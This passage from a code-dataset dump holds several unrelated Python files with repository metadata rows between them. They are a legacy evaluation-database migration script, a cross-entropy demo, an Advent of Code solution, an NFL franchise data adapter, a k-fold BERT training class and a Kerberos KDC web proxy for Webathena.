    global old_engine, zoo_session
    old_engine = create_engine(database_url, convert_unicode=True)
    zoo_session = scoped_session(sessionmaker(autocommit=False,
                                              autoflush=False,
                                              bind=old_engine))
    zoo.Base.metadata.create_all(bind=old_engine)
def id_to_committee(comm_id):
    """Map a Zookeeper committee id (0-8) to its display name.

    Ids 6 and 7 both map to 'Social'; an out-of-range id raises
    IndexError, just as indexing the original list did.
    """
    return (
        'Evaluations',
        'Financial',
        'History',
        'House Improvements',
        'Opcomm',
        'R&D',
        'Social',
        'Social',
        'Chairman',
    )[comm_id]
def get_fid(name):
    """Look up a freshman account id by display name.

    NOTE(review): assumes a FreshmanAccount row with this exact name
    exists — ``.first()`` returns None otherwise and the ``.id`` access
    raises AttributeError. The print() looks like leftover debug output.
    """
    from conditional.models.models import FreshmanAccount
    print(name)
    return FreshmanAccount.query.filter(FreshmanAccount.name == name).first().id
# Begin the Great Migration!
def migrate_models():
    """Copy all evaluation data from the legacy Zookeeper schema into the
    current Conditional models.

    Must be called after init_zoo_db(); reads through the module-level
    ``zoo_session`` and writes through the Flask-SQLAlchemy ``db.session``,
    committing once at the very end. Sections (freshman evals, committee
    meetings, conditionals, house meetings, major projects, on-floor,
    spring evals, housing evals) run in order and print progress markers.
    """
    print("BEGIN: freshman evals")
    # ==========
    # seminar name -> list of usernames that attended it
    tech_sems = {}
    freshman_evals = [
        {
            'username': f.username,
            'evalDate': f.voteDate,
            'projectStatus': f.freshProjPass,
            'signaturesMissed': f.numMissedSigs,
            'socialEvents': f.socEvents,
            'techSems': f.techSems,
            'comments': f.comments,
            'result': f.result
        } for f in zoo_session.query(zoo.FreshmanEval).all()]
    for f in freshman_evals:
        if not f['username'].startswith('f_'):
            # freshman who have completed packet and have a CSH account
            eval_data = models.FreshmanEvalData(f['username'], f['signaturesMissed'])
            # FIXME: Zookeeper was only pass/fail for freshman project not pending
            if f['projectStatus'] == 1:
                eval_data.freshman_project = 'Passed'
            eval_data.social_events = f['socialEvents']
            eval_data.other_notes = f['comments']
            eval_data.eval_date = f['evalDate']
            # TODO: conditional
            if f['result'] == "pass":
                eval_data.freshman_eval_result = "Passed"
            elif f['result'] == "fail":
                eval_data.freshman_eval_result = "Failed"
            else:
                eval_data.freshman_eval_result = "Pending"
            # techSems is a comma-separated string of seminar names.
            if f['techSems'] is not None:
                t_sems = f['techSems'].split(',')
                for sem in t_sems:
                    if sem not in tech_sems:
                        tech_sems[sem] = [f['username']]
                    else:
                        tech_sems[sem].append(f['username'])
            db.session.add(eval_data)
        else:
            # freshman not yet done with packet
            # TODO FIXME The FALSE dictates that they are not given onfloor
            # status
            account = models.FreshmanAccount(f['username'], False)
            account.eval_date = f['evalDate']
            if f['techSems'] is not None:
                t_sems = f['techSems'].split(',')
                for sem in t_sems:
                    if sem not in tech_sems:
                        tech_sems[sem] = [f['username']]
                    else:
                        tech_sems[sem].append(f['username'])
            db.session.add(account)
    print("tech sems")
    # Drop the empty seminar name produced by splitting empty strings.
    tech_sems.pop('', None)
    print(tech_sems)
    for t_sem in tech_sems:
        # TODO FIXME: Is there a timestamp we can migrate for seminars?
        from datetime import datetime
        sem = models.TechnicalSeminar(t_sem, datetime.now())
        db.session.add(sem)
        # Flush + refresh so sem.id is populated for the attendance rows.
        db.session.flush()
        db.session.refresh(sem)
        print(sem.__dict__)
        for m in tech_sems[t_sem]:
            if m.startswith("f_"):
                print(sem.id)
                a = models.FreshmanSeminarAttendance(get_fid(m), sem.id)
                db.session.add(a)
            else:
                a = models.MemberSeminarAttendance(m, sem.id)
                db.session.add(a)
    db.session.flush()
    print("END: freshman evals")
    # ==========
    print("BEGIN: migrate committee meeting attendance")
    # ==========
    # Distinct (date, committee) pairs become CommitteeMeeting rows.
    c_meetings = [
        (
            m.meeting_date,
            m.committee_id
        ) for m in zoo_session.query(zoo.Attendance).all()]
    c_meetings = list(set(c_meetings))
    c_meetings = list(filter(lambda x: x[0] is not None, c_meetings))
    c_meetings.sort(key=lambda col: col[0])
    com_meetings = []
    for cm in c_meetings:
        m = models.CommitteeMeeting(id_to_committee(cm[1]), cm[0])
        if cm[0] is None:
            # Skip meetings without a date (already filtered above).
            continue
        db.session.add(m)
        db.session.flush()
        db.session.refresh(m)
        com_meetings.append(cm)
    c_meetings = [
        (
            m.username,
            (
                m.meeting_date,
                m.committee_id
            )
        ) for m in zoo_session.query(zoo.Attendance).all()]
    for cm in c_meetings:
        if cm[1][0] is None:
            # Skip attendance rows whose meeting has no date.
            continue
        # Committee id 8 is 'Chairman'; its meetings are not migrated.
        if cm[1][1] == 8:
            continue
        if cm[0].startswith('f_'):
            f = models.FreshmanCommitteeAttendance(
                get_fid(cm[0]),
                com_meetings.index(cm[1])
            )
            db.session.add(f)
        else:
            # NOTE(review): members use index + 1 while freshmen use the raw
            # index above — looks like an off-by-one inconsistency; confirm
            # which matches the autoincrement ids of CommitteeMeeting.
            m = models.MemberCommitteeAttendance(cm[0], com_meetings.index(cm[1]) + 1)
            db.session.add(m)
    db.session.flush()
    print("END: migrate committee meeting attendance")
    # ==========
    print("BEGIN: migrate conditionals")
    # ==========
    condits = [
        {
            "uid": c.username,
            "desc": c.description,
            "deadline": c.deadline,
            "status": c.status
        } for c in zoo_session.query(zoo.Conditional).all()]
    for c in condits:
        # NOTE(review): the legacy 'status' field is read but never copied.
        condit = models.Conditional(c['uid'], c['desc'], c['deadline'])
        db.session.add(condit)
    print("END: migrate conditionals")
    # ==========
    print("BEGIN: house meetings")
    # Distinct meeting dates become HouseMeeting rows; keep a date->id map
    # for the attendance rows below.
    h_meetings = [hm.date for hm in zoo_session.query(zoo.HouseMeeting).all()]
    h_meetings = list(set(h_meetings))
    h_meetings.sort()
    print(h_meetings)
    house_meetings = {}
    for hm in h_meetings:
        m = models.HouseMeeting(hm)
        db.session.add(m)
        db.session.flush()
        db.session.refresh(m)
        house_meetings[hm.strftime("%Y-%m-%d")] = m.id
    print(house_meetings)
    hma = [
        {
            'uid': hm.username,
            'date': hm.date,
            'present': hm.present,
            'excused': hm.excused,
            'comments': hm.comments
        } for hm in zoo_session.query(zoo.HouseMeeting).all()]
    for a in hma:
        meeting_id = house_meetings[a['date'].strftime("%Y-%m-%d")]
        # Legacy flags are collapsed into a single status string.
        if a['present'] == 1:
            status = "Attended"
        elif a['excused'] == 1:
            status = "Excused"
        else:
            status = "Absent"
        excuse = a['comments']
        if a['uid'].startswith("f_"):
            # freshman
            fhma = models.FreshmanHouseMeetingAttendance(
                get_fid(a['uid']),
                meeting_id,
                excuse,
                status)
            db.session.add(fhma)
        else:
            # member
            mhma = models.MemberHouseMeetingAttendance(
                a['uid'],
                meeting_id,
                excuse,
                status)
            db.session.add(mhma)
    print("END: house meetings")
    # ==========
    print("BEGIN: Major Projects")
    projects = [
        {
            'username': mp.username,
            'name': mp.project_name,
            'description': mp.project_description,
            'status': mp.status
        } for mp in zoo_session.query(zoo.MajorProject).all()]
    for p in projects:
        mp = models.MajorProject(
            p['username'],
            p['name'],
            p['description']
        )
        # Anything that is neither 'pass' nor 'fail' keeps the model default.
        if p['status'] == 'pass':
            mp.status = 'Passed'
        if p['status'] == 'fail':
            mp.status = 'Failed'
        db.session.add(mp)
    print("END: Major Projects")
    # ==========
    print("BEGIN: ON FLOOR")
    import conditional.util.ldap as ldap
    from datetime import datetime
    # On-floor status is seeded from LDAP, not from Zookeeper.
    members = [m['uid'][0].decode('utf-8') for m in ldap.ldap_get_onfloor_members()]
    for m in members:
        db.session.add(models.OnFloorStatusAssigned(m, datetime.now()))
    print("END: ON FLOOR")
    print("BEGIN: SPRING EVALS")
    members = [m['uid'][0].decode('utf-8') for m in ldap.ldap_get_active_members()]
    for m in members:
        db.session.add(models.SpringEval(m))
    print("END: SPRING EVALS")
    print("BEGIN: Housing Evals")
    hevals = [
        {
            'username': he.username,
            'social_attended': he.social_attended,
            'social_hosted': he.social_hosted,
            'seminars_attended': he.seminars_attended,
            'seminars_hosted': he.seminars_hosted,
            'projects': he.projects,
            'comments': he.comments
        } for he in zoo_session.query(zoo.WinterEval).all()]
    for he in hevals:
        db.session.add(
            models.HousingEvalsSubmission(
                he['username'],
                he['social_attended'],
                he['social_hosted'],
                he['seminars_attended'],
                he['seminars_hosted'],
                he['projects'],
                he['comments']))
    print("END: Housing Evals")
    # Default EvalDB Settings
    db.session.add(models.EvalSettings())
    db.session.flush()
    db.session.commit()
1d1e074b61872504f96ce32330f37d8ab5634c26 | 789 | py | Python | ch04/cross_entropy_error.py | sankaku/deep-learning-from-scratch-py | 70ec531578f099136744d2c1ec11959b239c3854 | [
"MIT"
] | null | null | null | ch04/cross_entropy_error.py | sankaku/deep-learning-from-scratch-py | 70ec531578f099136744d2c1ec11959b239c3854 | [
"MIT"
] | null | null | null | ch04/cross_entropy_error.py | sankaku/deep-learning-from-scratch-py | 70ec531578f099136744d2c1ec11959b239c3854 | [
"MIT"
] | null | null | null | import numpy as np
def cross_entropy_error(y, t):
    """Cross-entropy error between prediction *y* and one-hot target *t*.

    A small epsilon is added inside the log so that log(0) never occurs.
    """
    eps = 1e-7  # to avoid log(0)
    log_likelihood = t * np.log(y + eps)
    return -np.sum(log_likelihood)
if __name__ == '__main__':
    # Demo: compare predictions of varying quality against a one-hot target.
    t = np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
    y1 = np.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
    y2 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
    y3 = np.array([0.1, 0.9, 0.3, 0.3, 0, 0, 0.2, 0, 0, 0.6])
    print('t = {0}'.format(t))
    print('y1 = {0}, cross_entropy_error = {1}'.format(
        y1, cross_entropy_error(y1, t)))
    print('y2 = {0}, cross_entropy_error = {1}'.format(
        y2, cross_entropy_error(y2, t)))
    print('y3 = {0}, cross_entropy_error = {1}'.format(
        y3, cross_entropy_error(y3, t)))
    # t against itself gives the minimum achievable error.
    print('t = {0}, cross_entropy_error = {1}'.format(
        t, cross_entropy_error(t, t)))
| 31.56 | 61 | 0.536122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.231939 |
1d1e45fe56dabcf2ddf962ee15b1e9639fc43965 | 466 | py | Python | day-02/part-2/david.py | badouralix/adventofcode-2018 | 543ce39d4eeb7d9d695459ffadca001a8c56386d | [
"MIT"
] | 31 | 2018-12-01T00:43:40.000Z | 2020-05-30T05:18:59.000Z | day-02/part-2/david.py | badouralix/adventofcode-2018 | 543ce39d4eeb7d9d695459ffadca001a8c56386d | [
"MIT"
] | 14 | 2018-12-01T12:14:26.000Z | 2021-05-07T22:41:47.000Z | day-02/part-2/david.py | badouralix/adventofcode-2018 | 543ce39d4eeb7d9d695459ffadca001a8c56386d | [
"MIT"
] | 10 | 2018-12-01T23:38:34.000Z | 2020-12-28T13:36:10.000Z | from tool.runners.python import SubmissionPy
class DavidSubmission(SubmissionPy):
    """AoC 2018 day 2 part 2: find the letters common to the two box ids
    that differ by exactly one character at the same position."""
    def bucket_key(self, w, i):
        """Return *w* with the character at index *i* removed."""
        return w[:i] + w[i + 1:]
    def run(self, s):
        ids = s.split("\n")
        width = len(ids[0])
        seen = [set() for _ in range(width)]
        for box_id in ids:
            for pos in range(width):
                key = self.bucket_key(box_id, pos)
                if key in seen[pos]:
                    # Two ids collide once one position is dropped: the key
                    # is exactly their shared characters.
                    return key
                seen[pos].add(key)
| 25.888889 | 44 | 0.48927 | 418 | 0.896996 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0.008584 |
1d20d0efe9e2afc5c843ccc72c38d5f99d5237b5 | 3,653 | py | Python | Plug-ins/PlexSportsAgent.bundle/Contents/Code/Teams/NFL/ProFootballReferenceFranchiseAdapter.py | waldosax/PlexSports | 404058921e4be02b93ad155bdaef768ff917620e | [
"MIT"
] | 5 | 2021-07-09T01:05:47.000Z | 2021-09-06T02:23:12.000Z | Plug-ins/PlexSportsAgent.bundle/Contents/Code/Teams/NFL/ProFootballReferenceFranchiseAdapter.py | waldosax/PlexSports | 404058921e4be02b93ad155bdaef768ff917620e | [
"MIT"
] | 1 | 2022-01-08T04:04:56.000Z | 2022-01-08T04:04:56.000Z | Plug-ins/PlexSportsAgent.bundle/Contents/Code/Teams/NFL/ProFootballReferenceFranchiseAdapter.py | waldosax/PlexSports | 404058921e4be02b93ad155bdaef768ff917620e | [
"MIT"
] | null | null | null | # Pro-Football-Reference.com
# TEAMS
import re, os
import uuid
import json
from datetime import datetime, date, time
from bs4 import BeautifulSoup
import bs4
from Constants import *
from PathUtils import *
from PluginSupport import *
from Serialization import *
from StringUtils import *
import ProFootballReferenceFranchiseScraper as FranschiseScraper
# Per-process cache of franchises. NOTE(review): appears unused in this
# module's visible code — confirm before removing.
pfr_cached_franchises = dict()
# Maps pro-football-reference.com franchise abbreviations to the NFL's
# official team abbreviations where the two sites disagree.
pfr_abbreviation_corrections = {
    "CRD": "ARI",
    "RAV": "BAL",
    "BBA": "BUF",
    "GNB": "GB",
    "HTX": "HOU",
    "CLT": "IND",
    "KAN": "KC",
    "RAI": "LV",
    "SDG": "LAC",
    "RAM": "LAR",
    "NWE": "NE",
    "NOR": "NO",
    "SFO": "SF",
    "TAM": "TB",
    "OTI": "TEN"
}
def DownloadAllFranchises(league):
    """Scrape all franchises from pro-football-reference.com and reshape
    them into the plugin's global teams model.

    Renames from/to keys, normalizes abbreviations, collects aliases from
    inactive team names, assigns stable ProFootballReference identifiers,
    and gathers logo assets. Returns the adapted franchises dict.

    NOTE(review): the *league* parameter is not used in this body.
    """
    pfrFranchises = dict(FranschiseScraper.GetFranchises())
    # Adapt franchises to global teams model
    for franchise in pfrFranchises.values():
        franchiseName = deunicode(franchise.get("fullName")) or deunicode(franchise.get("name"))
        if not franchise.get("fullName"): franchise["fullName"] = franchiseName
        franchiseName = franchise["fullName"]
        # Rename from/to keys to the model's fromYear/toYear.
        franchise["fromYear"] = franchise["from"]
        del(franchise["from"])
        franchise["toYear"] = franchise["to"]
        del(franchise["to"])
        for team in franchise["teams"].values():
            teamName = deunicode(team.get("fullName")) or deunicode(team.get("name"))
            # abbrev - NFL official abbreviation
            # id - identifier for the team, used by espn, relative to pfr
            abbrev = id = deunicode(franchise["abbrev"])
            active = team.get("active") == True
            aliases = team.get("aliases") or []
            if active:
                # The active team inherits every inactive name as an alias.
                for inactiveTeam in franchise["teams"].values():
                    if inactiveTeam.get("active") == True: continue
                    inactiveName = deunicode(inactiveTeam.get("fullName")) or deunicode(inactiveTeam.get("name")) or ""
                    if inactiveName:
                        aliases.append(inactiveName)
                        if team.get("city"):
                            if inactiveName[:len(team["city"])] == team["city"]:
                                # Get any deadname cities
                                aliases.append(deunicode(inactiveName[:len(team["city"])].strip()))
            if abbrev in pfr_abbreviation_corrections.keys():
                # Keep the pfr abbreviation as an alias, switch to NFL's.
                if active: aliases.append(abbrev)
                abbrev = pfr_abbreviation_corrections[abbrev]
            team["aliases"] = list(set(aliases))
            team["key"] = uuid.uuid4()
            if active:
                team["abbreviation"] = abbrev
            else:
                team["fullName"] = teamName
                del(team["name"])
            # Build the ProFootballReference id: abbrev, plus the stripped
            # franchise name and team name when they add information.
            prefix = abbrev
            franchisePrefix = strip_to_capitals(franchiseName)
            if prefix != franchisePrefix: prefix = "%s.%s" % (prefix, franchisePrefix)
            id = prefix
            suffix = strip_to_capitals(teamName)
            if suffix != franchisePrefix:
                id = "%s.%s" % (prefix, suffix)
            if team.get("abbreviation"): del(team["abbreviation"])
            team["ProFootballReferenceID"] = id
            team["identity"] = {"ProFootballReferenceID": id}
            # Reshape year spans into fromYear/toYear dicts.
            yrs = list(team["years"])
            team["years"] = []
            for span in yrs:
                team["years"].append({"fromYear":span["from"], "toYear":span["to"]})
            # Collect franchise-level and per-season logo assets.
            assets = dict()
            if franchise.get("logo"):
                assets.setdefault("logo", [])
                assets["logo"].append({"source": "profootballreference", "url": deunicode(franchise["logo"])})
            if team.get("years"):
                for span in team["years"]:
                    for year in range(int(span["fromYear"]), int(span["toYear"])+1):
                        season = str(year)
                        if team.get(season) and team[season].get("logo"):
                            assets.setdefault("logo", [])
                            assets["logo"].append({"source": "profootballreference", "season": season, "url": deunicode(team[season]["logo"])})
            if assets:
                team["assets"] = assets
    return pfrFranchises
| 29.224 | 123 | 0.636463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 894 | 0.24473 |
1d21e44ef2cd9394beeecb747e4069887cb35e0e | 9,565 | py | Python | KfoldBERT.py | JamesUOA/K-Fold-CrossValidation | 451b9ce3cd529c450922d52d436e6983f52b6fe0 | [
"Apache-2.0"
] | 1 | 2020-10-25T03:43:57.000Z | 2020-10-25T03:43:57.000Z | KfoldBERT.py | JamesUOA/K-Fold-CrossValidation | 451b9ce3cd529c450922d52d436e6983f52b6fe0 | [
"Apache-2.0"
] | null | null | null | KfoldBERT.py | JamesUOA/K-Fold-CrossValidation | 451b9ce3cd529c450922d52d436e6983f52b6fe0 | [
"Apache-2.0"
] | null | null | null | import torch
import numpy as np
import time
import datetime
import random
from Kfold import KFold
from split_data import DataManager
from transformers import BertTokenizer
from transformers import BertTokenizer
from torch.utils.data import TensorDataset, random_split
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from transformers import BertForSequenceClassification, AdamW, BertConfig
from transformers import get_linear_schedule_with_warmup
class KfoldBERTData(DataManager):
def __init__(self, data, labels, num_folds):
super().__init__(data, labels, num_folds)
self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)
def pre_process(self, sentences, labels):
max_len = 0
for sent in sentences:
input_ids = self.tokenizer.encode(sent, add_special_tokens=True)
max_len = max(max_len, len(input_ids))
input_ids = []
attention_masks = []
for sent in sentences:
encoded_dict = self.tokenizer.encode_plus(
sent,
add_special_tokens = True,
max_length = 350,
pad_to_max_length = True,
return_attention_mask = True,
return_tensors = 'pt',
truncation=True
)
input_ids.append(encoded_dict['input_ids'])
attention_masks.append(encoded_dict['attention_mask'])
# Convert the lists into tensors.
input_ids = torch.cat(input_ids, dim=0)
attention_masks = torch.cat(attention_masks, dim=0)
labels = torch.tensor(labels)
dataset = TensorDataset(input_ids, attention_masks, labels)
d, _ = random_split(dataset, [len(dataset), 0])
return d
class KfoldBERT(KFold):
    """K-fold cross-validation driver for a BERT sequence classifier.

    NOTE(review): ``self.device`` is only assigned when CUDA is available,
    and train() calls ``model.cuda()`` unconditionally — this class
    requires a GPU as written.
    """
    def __init__(self, data, labels, num_folds):
        super().__init__(data, labels, num_folds)
        self.batch_size = 8
        self.epochs = 10
        self.data = KfoldBERTData(data, labels, num_folds)
        if torch.cuda.is_available():
            self.device = torch.device("cuda")
    def flat_accuracy(self, preds, labels):
        """Fraction of argmax predictions matching the flattened labels."""
        pred_flat = np.argmax(preds, axis=1).flatten()
        labels_flat = labels.flatten()
        return np.sum(pred_flat == labels_flat) / len(labels_flat)
    def format_time(self, time):
        '''
        Takes a time in seconds and returns a string hh:mm:ss
        '''
        elapsed_rounded = int(round((time)))
        return str(datetime.timedelta(seconds=elapsed_rounded))
    def train(self, train_dataset, val_dataset):
        """Fine-tune BERT on *train_dataset*, validating each epoch on
        *val_dataset*; saves a checkpoint per epoch and returns the last
        epoch's (validation accuracy, validation loss)."""
        train_dataloader = DataLoader(
            train_dataset, # The training samples.
            sampler = RandomSampler(train_dataset), # Select batches randomly
            batch_size = self.batch_size # Trains with this batch size.
        )
        validation_dataloader = DataLoader(
            val_dataset, # The validation samples.
            sampler = SequentialSampler(val_dataset), # Pull out batches sequentially.
            batch_size = self.batch_size # Evaluate with this batch size.
        )
        model = BertForSequenceClassification.from_pretrained(
            "bert-base-uncased", # Use the 12-layer BERT model, with an uncased vocab.
            num_labels = 4, # The number of output labels--2 for binary classification.
            # You can increase this for multi-class tasks.
            output_attentions = False, # Whether the model returns attentions weights.
            output_hidden_states = False, # Whether the model returns all hidden-states.
        )
        model.cuda()
        optimizer = AdamW(model.parameters(),
                          lr = 2e-5, # args.learning_rate - default is 5e-5, our notebook had 2e-5
                          eps = 1e-8 # args.adam_epsilon - default is 1e-8.
                          )
        total_steps = len(train_dataloader) * self.epochs
        scheduler = get_linear_schedule_with_warmup(optimizer,
                                                    num_warmup_steps = 0, # Default value in run_glue.py
                                                    num_training_steps = total_steps)
        # Fix all RNG seeds for reproducible fine-tuning runs.
        seed_val = 42
        random.seed(seed_val)
        np.random.seed(seed_val)
        torch.manual_seed(seed_val)
        torch.cuda.manual_seed_all(seed_val)
        training_stats = []
        # Measure the total training time for the whole run.
        total_t0 = time.time()
        # For each epoch...
        for epoch_i in range(0, self.epochs):
            print("")
            print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, self.epochs))
            print('Training...')
            t0 = time.time()
            total_train_loss = 0
            model.train()
            # For each batch of training data...
            for step, batch in enumerate(train_dataloader):
                # Progress update every 40 batches.
                if step % 40 == 0 and not step == 0:
                    # Calculate elapsed time in minutes.
                    elapsed = self.format_time(time.time() - t0)
                    # Report progress.
                    print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))
                b_input_ids = batch[0].to(self.device)
                b_input_mask = batch[1].to(self.device)
                b_labels = batch[2].to(self.device)
                model.zero_grad()
                # Older transformers versions return (loss, logits) tuples.
                loss, logits = model(b_input_ids,
                                     token_type_ids=None,
                                     attention_mask=b_input_mask,
                                     labels=b_labels)
                total_train_loss += loss.item()
                loss.backward()
                # Clip gradients to stabilize fine-tuning.
                torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
                optimizer.step()
                scheduler.step()
            # Calculate the average loss over all of the batches.
            avg_train_loss = total_train_loss / len(train_dataloader)
            # Measure how long this epoch took.
            training_time = self.format_time(time.time() - t0)
            print("")
            print(" Average training loss: {0:.2f}".format(avg_train_loss))
            print(" Training epcoh took: {:}".format(training_time))
            # ========================================
            # Validation
            # ========================================
            # After the completion of each training epoch, measure our performance on
            # our validation set.
            print("")
            print("Running Validation...")
            t0 = time.time()
            model.eval()
            # Tracking variables
            total_eval_accuracy = 0
            total_eval_loss = 0
            nb_eval_steps = 0
            for batch in validation_dataloader:
                b_input_ids = batch[0].to(self.device)
                b_input_mask = batch[1].to(self.device)
                b_labels = batch[2].to(self.device)
                with torch.no_grad():
                    loss, logits = model(b_input_ids,
                                         token_type_ids=None,
                                         attention_mask=b_input_mask,
                                         labels=b_labels)
                # Accumulate the validation loss.
                total_eval_loss += loss.item()
                # Move logits and labels to CPU
                logits = logits.detach().cpu().numpy()
                label_ids = b_labels.to('cpu').numpy()
                # Calculate the accuracy for this batch of test sentences, and
                # accumulate it over all batches.
                total_eval_accuracy += self.flat_accuracy(logits, label_ids)
            # Report the final accuracy for this validation run.
            avg_val_accuracy = total_eval_accuracy / len(validation_dataloader)
            print(" Accuracy: {0:.2f}".format(avg_val_accuracy))
            # Calculate the average loss over all of the batches.
            avg_val_loss = total_eval_loss / len(validation_dataloader)
            # Measure how long the validation run took.
            validation_time = self.format_time(time.time() - t0)
            print(" Validation Loss: {0:.2f}".format(avg_val_loss))
            print(" Validation took: {:}".format(validation_time))
            # Record all statistics from this epoch.
            training_stats.append(
                {
                    'epoch': epoch_i + 1,
                    'Training Loss': avg_train_loss,
                    'Valid. Loss': avg_val_loss,
                    'Valid. Accur.': avg_val_accuracy,
                    'Training Time': training_time,
                    'Validation Time': validation_time
                }
            )
            # Checkpoint the model weights after every epoch.
            torch.save(model.state_dict(), "removed_model_epoch_" + str(epoch_i + 1) +".pth")
        print("")
        print("Training complete!")
        print("Total training took {:} (h:mm:ss)".format(self.format_time(time.time()-total_t0)))
        return avg_val_accuracy, avg_val_loss
| 40.529661 | 118 | 0.540408 | 9,086 | 0.949922 | 0 | 0 | 0 | 0 | 0 | 0 | 2,022 | 0.211396 |
1d224808f2a6914ef8278b9e81b293979d0a85e1 | 7,957 | py | Python | kdc/kdc.py | cesium12/webathena | 3ccd870bf7543966e613cf36dbbbb1aabf53e581 | [
"MIT"
] | null | null | null | kdc/kdc.py | cesium12/webathena | 3ccd870bf7543966e613cf36dbbbb1aabf53e581 | [
"MIT"
] | null | null | null | kdc/kdc.py | cesium12/webathena | 3ccd870bf7543966e613cf36dbbbb1aabf53e581 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# pylint: disable=invalid-name
""" Web-based proxy to a Kerberos KDC for Webathena. """
import base64
import json
import os
import select
import socket
import dns.resolver
from pyasn1.codec.der import decoder as der_decoder
from pyasn1.codec.der import encoder as der_encoder
from pyasn1.error import PyAsn1Error
from werkzeug.exceptions import HTTPException
from werkzeug.routing import Map, Rule
from werkzeug.wrappers import Request, Response
import krb_asn1
import settings
# Maximum UDP datagram size we send to / accept from a KDC.
# This is the same limit used internally in MIT Kerberos it seems.
MAX_PACKET_SIZE = 4096
# How many bytes of randomness to return from the /v1/urandom endpoint
URANDOM_BYTES = 1024 // 8
def wait_on_sockets(socks, timeout):
    """Select on a list of UDP *socks* for up to *timeout* seconds.

    Returns the first non-empty packet read from a readable socket, or
    None if nothing readable produced data before the timeout.
    """
    readable, _, _ = select.select(socks, [], [], timeout)
    for ready_sock in readable:
        packet = ready_sock.recv(MAX_PACKET_SIZE)
        if packet:
            return packet
    return None
# Algorithm borrowed from MIT kerberos code. This probably works or
# something.
def send_request(socks, data):
    """
    Attempts to send a single request to a number of UDP sockets until
    one returns or we timeout. Handles retry.

    Makes up to three passes over the sockets, waiting 1 second per
    socket after each send, then an exponentially growing window
    (2s, 4s, 8s) for any socket to reply. Returns the reply bytes,
    or None if every attempt timed out.
    """
    delay = 2
    for _ in range(3):
        for sock in socks:
            # Send the request.
            ret = sock.send(data)
            if ret == len(data):
                # Wait for a reply for a second.
                reply = wait_on_sockets(socks, 1)
                if reply is not None:
                    return reply
        # Wait for a reply from anyone.
        reply = wait_on_sockets(socks, delay)
        if reply is not None:
            return reply
        delay *= 2
    return None
class WebKDC:
def __init__(self, realm=settings.REALM):
self.realm = realm
self.url_map = Map([
Rule('/v1/AS_REQ', endpoint=('AS_REQ', krb_asn1.AS_REQ), methods=['POST']),
Rule('/v1/TGS_REQ', endpoint=('TGS_REQ', krb_asn1.TGS_REQ), methods=['POST']),
Rule('/v1/AP_REQ', endpoint=('AP_REQ', krb_asn1.AP_REQ), methods=['POST']),
Rule('/v1/urandom', endpoint=self.handle_urandom, methods=['POST']),
])
@staticmethod
def validate_AS_REQ(req_asn1):
msg_type = int(req_asn1.getComponentByName('msg-type'))
if msg_type != krb_asn1.KDC_REQ.msg_type_as:
raise ValueError('Bad msg-type')
@staticmethod
def validate_TGS_REQ(req_asn1):
msg_type = int(req_asn1.getComponentByName('msg-type'))
if msg_type != krb_asn1.KDC_REQ.msg_type_tgs:
raise ValueError('Bad msg-type')
@staticmethod
def validate_AP_REQ(req_asn1):
pass
@staticmethod
def _error_response(e):
""" Returns a Response corresponding to some exception e. """
data = {'status': 'ERROR', 'msg': str(e)}
return Response(json.dumps(data), mimetype='application/json')
@staticmethod
def handle_urandom():
random = os.urandom(URANDOM_BYTES)
# FIXME: We probably should be using a constant-time encoding
# scheme here...
return Response(
base64.b64encode(random),
mimetype='application/base64',
headers=[('Content-Disposition',
'attachment; filename="b64_response.txt"')])
def proxy_kdc_request(self, request, endpoint):
"""
Common code for all proxied KDC requests. endpoint is a
(req_name, asn1Type) tuple and comes from the URL map. req_b64
is base64-encoded request. Calls self.validate_${req_name} to
perform additional checks before sending it along.
"""
req_name, asn1Type = endpoint
# Werkzeug docs make a big deal about memory problems if the
# client sends you MB of data. So, fine, we'll limit it.
length = request.headers.get('Content-Length', type=int)
if length is None or length > MAX_PACKET_SIZE * 2:
return self._error_response('Payload too large')
req_b64 = request.data
try:
req_der = base64.b64decode(req_b64)
except TypeError as e:
return self._error_response(e)
# Make sure we don't send garbage to the KDC. Otherwise it
# doesn't reply and we time out, which is kinda awkward.
try:
req_asn1, rest = der_decoder.decode(req_der,
asn1Spec=asn1Type())
if rest:
raise ValueError('Garbage after request')
getattr(self, 'validate_' + req_name)(req_asn1)
except (PyAsn1Error, ValueError) as e:
return self._error_response(e)
# Okay, it seems good. Go on and send it, reencoded.
krb_rep = self.send_krb_request(
der_encoder.encode(req_asn1),
use_master='use_master' in request.args)
if krb_rep is None:
data = {'status': 'TIMEOUT'}
else:
# TODO: The JSON wrapping here is really kinda
# pointless. Just make this base64 and report errors with
# HTTP status codes + JSON or whatever.
data = {'status': 'OK', 'reply': base64.b64encode(krb_rep).decode('ascii')}
# Per Tangled Web, add a defensive Content-Disposition to
# prevent an extremely confused browser from interpreting this
# as HTML. Though even navigating to this would be pretty
# difficult as we require a random header be sent.
return Response(
json.dumps(data),
mimetype='application/json',
headers=[('Content-Disposition',
'attachment; filename="json_response.txt"')])
def send_krb_request(self, krb_req, use_master):
"""
Sends Kerberos request krb_req, returns the response or None
if we time out. If use_master is true, we only talk to the
master KDC.
"""
svctype = '_kerberos-master' if use_master else '_kerberos'
# TODO: Support TCP as well as UDP. I think MIT's KDC only
# supports UDP though.
socktype = '_udp'
srv_query = '%s.%s.%s' % (svctype, socktype, self.realm)
srv_records = list(getattr(dns.resolver, 'resolve', dns.resolver.query)(srv_query, 'SRV'))
srv_records.sort(key=lambda r: r.priority)
socks = []
try:
for r in srv_records:
host = str(r.target)
port = int(r.port)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setblocking(0)
s.connect((host, port))
socks.append(s)
return send_request(socks, krb_req)
finally:
for s in socks:
s.close()
def dispatch_request(self, request):
adapter = self.url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
if callable(endpoint):
return endpoint()
return self.proxy_kdc_request(request, endpoint, **values)
except HTTPException as e:
return e
def wsgi_app(self, environ, start_response):
